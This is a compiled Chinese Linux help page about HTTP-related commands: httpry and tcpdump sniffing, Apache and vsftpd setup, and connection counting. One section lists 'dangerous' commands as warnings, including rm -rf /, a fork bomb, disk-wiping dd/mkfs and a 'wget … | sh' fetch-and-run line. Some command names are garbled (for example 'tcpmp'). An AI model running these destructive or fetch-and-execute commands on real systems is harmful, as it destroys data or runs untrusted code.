linuxhttp命令

① 如何在linux下使用命令行嗅探HTTP流量

假设由于某种原因，你需要嗅探HTTP站点的流量（如HTTP请求与响应）。举个例子，你可能在测试一个web服务器的实验性功能，或者你在为某个web应用或RESTful服务排错，又或者你正在为PAC(proxy auto config)排错或寻找某个站点下载的恶意软件。不论什么原因，在这些情况下，进行HTTP流量嗅探对于系统管理、开发者、甚至最终用户来说都是很有帮助的。
数据包嗅工具tcpmp被广泛用于实时数据包的导出，但是你需要设置过滤规则来捕获HTTP流量，甚至它的原始输出通常不能方便的停在HTTP协议层。实时web服务器日志解析器如ngxtop可以提供可读的实时web流量跟踪痕迹，但这仅适用于可完全访问live web服务器日志的情况。

要是有一个仅用于抓取HTTP流量的类似tcpmp的数据包嗅探工具就非常好了。事实上，httpry就是:HTTP包嗅探工具。httpry捕获HTTP数据包，并且将HTTP协议层的数据内容以可读形式列举出来。通过这篇指文章，让我们了解如何使用httpry工具嗅探HTTP流量。
在Linux上安装httpry
基于Debian系统（Ubuntu 或 LinuxMint），基础仓库中没有httpry安装包(译者注：本人ubuntu14.04,仓库中已有包，可直接安装)。所以我们需要通过源码安装:
$ sudo apt-get install gcc make git libpcap0.8-dev$ git clone https://github.com/jbittel/httpry.git$ cd httpry$ make$ sudo make install

在Fedora，CentOS 或 RHEL系统，可以使用如下yum命令安装httpry。在CentOS/RHEL系统上，运行yum之前使其能够访问EPEL repo。
$ sudo yum install httpry

如果你仍想通过基于RPM系统的源码来安装httpry的话，你可以通过这几个步骤实现：
$ sudo yum install gcc make git libpcap-devel$ git clone https://github.com/jbittel/httpry.git$ cd httpry$ make$ sudo make install

httpry的基本用法
以下是httpry的基本用法
$ sudo httpry -i <network-interface>

httpry就会监听指定的网络接口，并且实时的显示捕获到的HTTP请求/相应。

在大多数情况下，由于发送与接到的数据包过多导致刷屏很快，难以分析。这时候你肯定想将捕获到的数据包保存下来以便离线分析。可以使用'b'或'-o'选项保存数据包。'-b'选项将数据包以二进制文件的形式保存下来，这样可以使用httpry软件打开文件以浏览。另一方面，'-o'选项将数据以可读的字符文件形式保存下来。
以二进制形式保存文件：
$ sudo httpry -i eth0 -b output.mp

浏览所保存的HTTP数据包文件：
$ httpry -r output.mp

注意，不需要根用户权限就可以使用'-r'选项读取数据文件。
将httpry数据以字符文件保存：
$ sudo httpry -i eth0 -o output.txt

httpry 的高级应用
如果你想监视指定的HTTP方法（如：GET，POST，PUT，HEAD，CONNECT等），使用'-m'选项：
$ sudo httpry -i eth0 -m get,head

如果你下载了httpry的源码，你会发现源码下有一些Perl脚本，这些脚本用于分析httpry输出。脚本位于目录httpry/scripts/plugins。如果你想写一个定制的httpry输出分析器，则这些脚可以作为很好的例子。其中一些有如下的功能：
hostnames: 显示唯一主机名列表。
find_proxies: 探测web代理。
search_terms: 查找及统计在搜索服务里面的搜索词。
content_analysis: 查找含有指定关键的URL。
xml_output: 将输出转换为XML形式。
log_summary: 生成日志汇总。
db_mp: 将日志文件数据保存数据库。
在使用这些脚本之前，首先使用'-o'选项运行httpry。当获取到输出文件后，立即使用如下命令执行脚本：
$ cd httpry/scripts$ perl parse_log.pl -d ./plugins <httpry-output-file>

你可能在使用插件的时候遇到警告。比如，如果你没有安装带有DBI接口的MySQL数据库，那么使用db_mp插件时可能会失败。如果一个插件初始化失败的话，那么只是这个插件不能使用，所以你可以忽略那些警告。
当parse_log.pl完成后，你将在httpry/scripts 目录下看到数个分析结果。例如，log_summary.txt 与如下内容类似。

总的来说，当你要分析HTTP数据包的时候，httpry非常有用。它可能并不被大多Linux使用者所熟知，但会用总是有好处的。你觉得这个工具怎么样呢？
https://linux.cn/article-4148-1.html

② linux运维必须知道的几个常用命令

Linux是一个命令行组成的操作系统，精髓在命令行，无论图形界面发展到什么水平这个原理都是无法改变的，Linux命令有许多强大功能：从简单的磁盘操作、文件存取以及复杂的多媒体图像和媒体文件都会使用到命令。
Linux常用的命令有哪些？老男孩教育为大家总结一下：
安装和登录命令：login 、shutdown 、halt 、reboot 、mount 、umount 、chsh
文件处理命令：file 、mkdir 、grep 、dd 、find 、mv 、ls 、diff 、cat 、ln
网络操作命令：ifconfig 、ip 、ping 、netstat 、telnet 、ftp 、route 、rlogin rcp 、finger
、mail 、nslookup
系统安全相关命令：passwd 、su 、umask 、chgrp 、chmod 、chown 、chattr、sudo、pswho
系统管理相关命令：df 、top 、free 、quota 、at 、lp 、 adser 、groupadd kill 、 crontab 、tar、unzip 、gunzip 、last

③ Linux哪些命令最危险

这9个“非常危险”的Linux命令一定要记住!

1、rm-rf命令

rm-rf命令是删除文件夹及其内容最快的一种方式，仅仅一丁点的敲错或者无知都可能导致不可恢复的系统崩坏。

rm命令在Linux下通常用来删除文件

rm-f命令递归的删除文件夹，甚至是空的文件夹

rm-f命令能不经过询问直接删除只读文件

rm-rf/：强制删除根目录下所有东西

rm-rf/*：强制删除当前目录的所有文件

rm-rf.：强制删除当前文件夹及其子文件

温馨提示：当你要执行rm -rf命令时，一定要留心，可以在“.bashrc”文件对“rm”命令创建rm
-i的别名，来预防用‘rm’命令删除文件时的事故。

2、:(){:|:&};:命令

这就是一个fork炸弹的实例。具体操作是通过定义一个名为'：'的函数，它会调用自己两次，一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。

3、命令 >/dev/sda

上列命令会将某个'命令'的输出写到块设备/dev/sda中。该操作会将在块设备中的所有数据块替换为命令写入的原始数据，从而导致整个块设备的数据丢失。

4、mv文件夹/dev/null

这个命令会移动某个'文件夹'到/dev/null。在Linux中/dev/null或null设备是一个特殊的文件，所有写入它的数据都会被清除，然后返回写操作成功。

5、wget http://malicious_source -O- | sh

上面这个命令会从一个恶意源下载一个脚本并执行。Wget命令会下载这个脚本，而sh会执行下载下来的脚本。

温馨提示：你应该时刻注意你下载包或者脚本的源。只能使用那些从可信任的源中下载脚本/程序。

6、mkfs.ext3 /dev/sda

上列命令会格式化设备'sda'，你无疑知道在执行上列命令后你的块设备会被格式化，崭新的。没有任何数据，直接让你的系统达到不可恢复的阶段。

7、> file

上面命令常用来清空文件内容，如果用上列执行时输入错误或无知的输入类似“> xt.conf”的命令会覆盖配置文件或其他任何的系统配置文件。

8、^foo^bar

这个命令用来编辑先前运行的命令而无需要打整个命令。但当用foobar命令时如果你没有彻底检查改变原始命令的风险，这可能导致真正的麻烦。

9、dd if=/dev/random of=/dev/sda

上面这个命令会向块设备sda写入随机的垃圾文件从而擦除数据。当然，你的系统可能陷入混乱和不可恢复的状态。

④ 如何在linux系统搭建http服务

1、安装ftp服务端，方便你从客户端上传文件。linux上一般安装vsftp.VSFTP的软件安装包是： vsftpd-2.2.2-12.el6_5.1.i686.rpm
查询：#rpm -q vsftpd
安装：#rpm -ivh vsftpd-2.2.2-12.el6_5.1.i686.rpm或者直接yum install vsftpd
启动、停止及重启VSFTP的命令： #service vsftpd start/stop/restart
配置文件：
/etc/vsftpd/vsftpd.conf //主配置文件
/etc/vsftpd.ftpusers //被禁止登录FTP的用户文件
/etc/vsftpd.user_list //允许登录FTP的用户文件
a、将登录后的用户限制在本地家目录下：
#vi /etc/vsftpd/vsftpd.conf
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
新建受限用户的列表文件并加入受限用户名
#vi /etc/vsftpd.chroot_list
raykeso
重启ftp服务
#service vsftpd restart
2、安装apache，开启目录索引，这样你就可以浏览和下载文件。
apache配置文件
<Directory "I:/build/dist"> #设置浏览文件的目录
Options Indexes #开启目录列表索引模式Order allow,deny
Allow from all
</Directory>

⑤ linux 系统查找整台机http.conf文件放在那,用什么命令

11,查找文件的locate命令

locate 命令可用来搜索包含指定条件字符串的文件或目录。范例如下：

[tony@free tony]$ locate zh_CN 列出所有包含“zh_CN”字符串的文件和目录。

由于locate命令是从系统中保存文件及目录名称的数据库中搜索文件，虽然系统会定时更新数据库，但对于刚新增或删除的文件、目录，仍然可能会因为数据库尚未更新而无法查得，此时可用root身份运行updatedb命令更新，为此数据库得内容正确。

12，搜索字符串得grep命令

grep 命令可以搜索特定字符串来并显示出来，一般用来过滤先前得结果，避免显示太多不必要得信息。范例如下：

[tony@free etc]$ grep text *.conf ← 搜索当前目录中扩展名为.conf且包含“text”字符串得文件。

grep:amd.conf: ← 拒绝不符权限得操作

grep:diskcheck.conf: ← 拒绝不符权限得操作

grep:grub.conf ← 拒绝不符权限得操作

 若您是使用一般权限的用户运行，上例的输出结果会包含很多如“拒绝不符权限的操作之类的错误信息，可使用-s参数消除。

[tony@free etc]$ grep –s text *.conf

你根据这些提示试试吧!

⑥ Linux启动httpd命令

Linux httpd命令是Apache HTTP服务器程序。httpd为Apache HTTP服务器程序。直接执行程序可启动服务器的服务。

1、apahce启动命令：推荐/usr/local/apache2/bin/apachectl start apaceh启动

2、apache停止命令:/usr/local/apache2/bin/apachectlstop 停止

3、apache重新启动命令：/usr/local/apache2/bin/apachectl restart 重启要在重启 Apache 服务器时不中断当前的连接，则应运行：/usr/local/sbin/apachectl graceful

如果apache安装成为linux的服务的话，可以用以下命令操作：service httpd start 启动service httpd restart 重新启动service httpd stop 停止服务

4.httpd是Apache超文本传输协议(HTTP)服务器的主程序。被设计为一个独立运行的后台进程，它会建立一个处理请求的子进程或线程的池。

通常，httpd不应该被直接调用，而应该在类Unix系统中由 apachectl 调用，在Windows NT/2000/XP/2003中作为服务运行和在Windows 95/98/ME中作为控制台程序运行。

(6)linuxhttp命令扩展阅读

linux与windows对比

1、 编程篇

虽然五年已经过去了，但是系统编程的模式基本没有什么改变，由于GPL的存在linux在编程效率上比windows要高不少，这是因为GPL公开程序代码，这样可以减少重复开发，所以linux在编程模式上比windows要略微强点。

但是须知windows还是常用软件的主要载体，所以windows下的软件还是要移植到windows下的，当然有很多软件还是一直就在windows下开发的，所以这点windows并不比linux弱的太多。

值得一提的是windows8种引入的windows store，这样的应用不知道可不可以在linux下开发，貌似目前windows8 app都是在windows8下开发的。

2、运行平台篇

linux系统可以运行在几乎所有的硬件结构上，无论是intel、amd、arm处理器都可以，甚至我国的龙芯上跑的也是linux。而windows在更新到windows8后也实现了支持intel、amd和arm三大处理器架构。

但是相对而言，windows8 RT只能运行在特定的架构上并且不发售零售版，所以可以暂时不考虑。即linux比windows支持的处理器平台多。

linux下处理器性能能否达到windows的标准还很难说，因为电源管理等诸多问题，linux并不一定能发挥硬件的全部效率。这点在显卡上体现的特别明显。

AMD的显卡开源驱动只能实现显卡一半的性能，所以在运行平台上，linux兼容的更多，但是windows更完美，相对而言，只考虑运行平台的话（能用）linux略占优势。

3、 硬件支持篇

linux的硬件支持除了显卡外我感觉还是和windows保持同步的，比如usb3.0，HDMI等但在显卡方面，尤其是双显卡方面linux就和windows差距明显了，linux目前还没有可靠的双显卡交火或者双显卡交互手段，所以就凭这一点linux在硬件支持方面占极大劣势，

因为没有双显卡支持会导致双显卡一直通电，能耗直线上升! 虽然linux的新内核早已解决了这个问题，但是linux下显卡驱动的不足也导致这方面问题没有根本解决。

4、网络篇

个人感觉除了google的chorme os外linux的网络已经发展的登峰造极了，linux对网络的利用率是非常高的，毕竟GPL的基本交流手段就是网络，所以网络功能上linux很给力的，至于ipv6什么的windows和linux早就一样哈皮了。

不过有一点就是flash player上的问题制约了linux网络媒体的应用，因为flash player在linux占用的资源过高，导致性能下降……

5、 设备驱动篇

这个linux基本上什么设备都能认出来，但是能驱动的设备显然没有windows多，毕竟除了arm处理器外基本上每个硬件都会为windows写驱动，但是能为linux写驱动的就不多了，很多linux驱动是用开源驱动的，这样的话效率……

所以个人感觉windows的驱动比linux下强。

6、 UNIX能力篇

这个，我不太同意原作者设立这个指标的，毕竟linux是unix like系统，而windows和这个不沾边……所以UNIX能力肯定是linux强啊，但是不是还有原版的unix么，所以这点应该列入评价指标。

7、性能篇

这个是很重要的一点，原作者分为开放性、多用户和多任务三个方面来进行的对比。开放性其实linux和windows都一样的，都很开放，不过windows8相比前辈们有点保守，所以linux的开放性应该更好点。

多用户方面，linux和windows都支持多个用户，但是linux可以多用户同时登陆，不过考虑到个人电脑的情况，这个指标一般没有什么用。所任务，这点有很多测评，大家可以去网络或者google一下，一般大家都认为linux效率更高一点。

8、创新篇

我实际上很反对这种为了创新而创新的对比方式的。windows和linux都是操作系统，为了实现类似的功能，出现多多少少一些类似是正常的。

就开发状态而言，linux是开源的，而windows不开源，所以linux应该高点，但是不要忘了windows系统也能得到全世界的很多第三方软件的支持，所以创新性而言双方并没有可比性，因该是在同一水平。

9、病毒防护篇

这一点毫无疑问是linux获胜，目前世界上还没有一种可以在linux下大规模泛滥的病毒，而且linux的安全性完全是建立在其保守的内核设计上的，所以linux是很安全的。相对于windows虽然windows8在win7的基础上又提高了很多，但是与linux还是有差距的。

实际上，为了保证用户体验，很多时候windows是必须牺牲防护性能的，所以能做到这点已经非常不容易了，真要超级安全的还FreeBSD是不是更安全呢？

10、稳定篇

系统稳定性上我感觉linux与windows不相上下，因为windows与linux都会崩溃，虽然windows崩溃原因很多，而linux崩溃大部分是有误操作，但是二者的差距真心没有那么大，而且windows实际上出现蓝屏代码什么的故障次数也已经比以前少多了。

⑦ 查看当前linux有多少条http链接 的命令语句

1、查看apache当前并发访问数：


#对比httpd.conf中MaxClients的数字差距多少。
netstat -an | grep ESTABLISHED | wc -l

2、查看httpd进程数（即prefork模式下Apache能够处理的并发请求数）：
ps aux|grep httpd|wc -l

3、可以使用如下参数查看数据


ps -ef|grep httpd|wc -l
#1388
#统计httpd进程数，连个请求会启动一个进程，使用于Apache服务器。
#表示Apache能够处理1388个并发请求，这个值Apache可根据负载情况自动调整。
netstat -nat|grep -i "80"|wc -l
#4341
#netstat -an会打印系统当前网络链接状态，而grep -i "80"是用来提取与80端口有关的连接的，wc -l进行连接数统计。
#最终返回的数字就是当前所有80端口的请求总数。
netstat -na|grep ESTABLISHED|wc -l
#376
#netstat -an会打印系统当前网络链接状态，而grep ESTABLISHED 提取出已建立连接的信息。 然后wc -l统计。
#最终返回的数字就是当前所有80端口的已建立连接的总数。
netstat -nat||grep ESTABLISHED|wc
#可查看所有建立连接的详细记录

4、查看Apache的并发请求数及其TCP连接状态：

netstat -n | awk '/^tcp/ {++S[$NF]} END {for (a in S) print a, S[a]}'

（这条语句是从 新浪互动社区事业部 新浪互动社区事业部技术总监王老大那儿获得的，非常不错）返回结果示例：


LAST_ACK 5
SYN_RECV 30
ESTABLISHED 1597
FIN_WAIT1 51
FIN_WAIT2 504
TIME_WAIT 1057

其中:
SYN_RECV表示正在等待处理的请求数；
ESTABLISHED表示正常数据传输状态；
TIME_WAIT表示处理完毕，等待超时结束的请求数。

5、输出每个ip的连接数，以及总的各个状态的连接数
netstat -n | awk '/^tcp/ {n=split($(NF-1),array,":");if(n<=2)++S[array[(1)]];else++S[array[(4)]];++s[$NF];++N} END {for(a in S){printf("%-20s %s\n", a, S[a]);++I}printf("%-20s %s\n","TOTAL_IP",I);for(a in s) printf("%-20s %s\n",a, s[a]);printf("%-20s %s\n","TOTAL_LINK",N);}'

⑧ linux怎么抓取http请求

①-安装tcpmp(命令) wireshark（图形化）
②-tcpmp tcp port 80 -n -X -s 0

###在终端输出
③-tcpmp tcp port 80 -n -s 0 -w /tmp/tcp.cap
###通过wireshark进行查看
④-tcpmp tcp port 80 -n -s 0 -X -l |grep xxx
###xxx为 你要过滤的关键字

⑨ 如何在Linux上从命令行嗅探HTTP流量

假设你出于某个原因而想嗅探网络上的实时HTTP Web流量（比如HTTP请求和回应）。比如说，你可能在测试网站服务器的试验性功能，或者在调试Web应用程序或充分利用REST的服务，抑或是你想要为PAC（代理自动配置）排查故障，或检查从某个网站偷偷下载的任何恶意软件文件。不管出于什么原因，嗅探HTTP流量大都有帮助，对系统管理员、开发人员、甚至最终用户来说都是如此。

虽然tcpmp等数据包嗅探工具广泛用于实时的数据包转储，你还是需要建立合理的过滤机制，以便只捕获HTTP流量；即使那样，通常无法很容易地在HTTP协议层面解读它们的原始输出。ngxtop等实时网站服务器日志分析工具提供了人类可读的实时网站流量痕迹，但只有在完全访问实时网站服务器日志的情况下才适用。

虽然拥有tcpmp之类的嗅探工具不错，但只针对HTTP流量。实际上，httpry正是我们所需的一款HTTP数据包嗅探工具。httpry可捕获网络上的实时HTTP数据包，并且以一种人类可读的格式，显示HTTP协议层面的内容。我们在本教程中将看看如何使用httpry来嗅探HTTP流量。

将httpry安装到Linux上

在基于Debian的系统上（Ubuntu或Linux Mint），httpry并未出现在基本软件库中。所以要使用其源代码来构建它：

在Fedora、CentOS或RHEL上，你可以使用yum来安装httpry，如下所示。在CentOS/RHEL上，先启用EPEL软件库，再运行yum。

如果你仍想在基于RPM的系统上使用源代码来构建httpry，很容易做到这一点，只要：

httpry的基本用法

httpry的基本使用场合如下：

httpry随后侦听某个特定的网络接口，并实时显示捕获的HTTP请求/回应。

不过在大多数情况下，由于大量数据包进进出出，你会看到快速滚动的输出结果。所以，你应该保存已捕获的HTTP数据包以便离线分析。为此，使用“-b”或“-o”选项。“-b”选项让你可以将原始的HTTP数据包保存到二进制文件中，然后可以使用httpry回放HTTP数据包。另一方面，“-o”选项将httpry人类可读的输出结果保存到文本文件中。

想把原始的HTTP数据包保存到二进制文件中：

回放已保存的HTTP数据包：

请注意：当你使用“-r”选项读取转储文件时，就不需要根权限。

想将httpry的输出结果保存到文本文件中：

httpry的高级用法

如果你只想监视特定的HTTP方法（比如GET、POST、PUT、HEAD和CONNECT等），可以使用“-m”选项：

如果你下载了httpry的源代码，就会注意到源代码随带一系列有助于分析httpry输出结果的Perl脚本。这些脚本位于httpry/scripts/plugins目录中。如果你想编写自定义的脚本来分析httpry的输出结果，这些脚本就是可供参考的好例子。其中一些功能如下：

•hostnames：显示独特主机名称和主机数量的列表。

•find_proxies：检测网站代理系统。

•search_terms：查找并计数搜索服务中输入的搜索词语。

•content_analysis：查找含有特定关键词的URL。

•xml_output：将输出结果转换成XML格式。

•log_summary：生成日志摘要。

•db_mp：将日志文件数据转储到MySQL数据库中。

在使用这些脚本之前，先使用“-o”选项运行httpry一段时间。一旦你获得了输出文件，使用下面这个命令，运行一次脚本：

你可能会遇到几个插件的警告信息。比如说，如果你没有创建带DBI接口的MySQL数据库，db_mp插件就可能会出错。要是某个插件未能初始化，它会自动被禁用。所以，你可以忽视那些警告信息。

在parse_log.pl完成之后，你会在httpry/scripts目录下看到许多分析结果（*.txt/xml）。比如说，log_summary.txt看起来就像下面这样：

总而言之，如果你碰到需要解读实时HTTP数据包的情况，httpry就帮得上大忙。普通的Linux用户可能不常解读实时HTTP数据包，但防患未然总归不是件坏事。你觉得这款工具如何？谢谢阅读，希望能帮到大家，请继续关注，我们会努力分享更多优秀的文章。

英文：http://xmolo.com/2014/08/sniff-http-traffic-command-line-linux.html